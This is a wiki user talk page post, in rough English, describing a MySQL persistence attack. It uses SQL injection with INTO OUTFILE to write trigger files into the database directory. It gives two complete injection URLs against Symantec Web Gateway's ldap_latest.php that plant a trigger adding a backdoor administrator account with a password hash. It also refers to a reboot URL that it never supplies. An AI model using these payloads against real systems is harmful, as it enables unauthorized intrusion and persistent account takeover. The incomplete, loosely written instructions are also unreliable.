User talk:Dowload

new attack vector exploit mysql via trigger logs.
1. the first i will explain what is mysql trigger? mysql triggers are small programs that are stored in the database itself, and are activated by database events which often originate at the application layer. These precipitating database events are UPDATE, DELETE or INSERT queries. The trigger itself may execute before or after the query that initiates it.

2. exploit Mysql Trigger logs. As you know MySQL trigger have files "ins_trig.TRN" and "eventlog.TRG" and have them used in MySQL. Now, it works when I add them to the /var/lib/mysql/databasename/ directory but it makes me restart MySQL for it to recognize the trigger. So if we can insert malicode in that file to create trigger execute that malicode.

3. for examples. - if website have vulnerability sql injection and user in that site can read file system (load file, into outfile). example with vulnerablity of Symantec Web Gateway we can exploit with.

+ https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERNAME' into outfile '/var/lib/mysql/spywall_db/ins_trig.TRN' LINES TERMINATED BY '\ntrigger_table=eventlog\n';--

+ https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/spywall_db/eventlog.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N/A","0","0","0","","hacker@offsec.com","1336255408","0","0","0");\\nend\'\nsql_modes=0\ndefiners=\'shadm@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';--

With the MySQL trigger in place, an authenticated user can initiate a reboot of the remote system by accessing the following URL. When a user logs back in to the application, the trigger will be activated and the new user will be added to the system.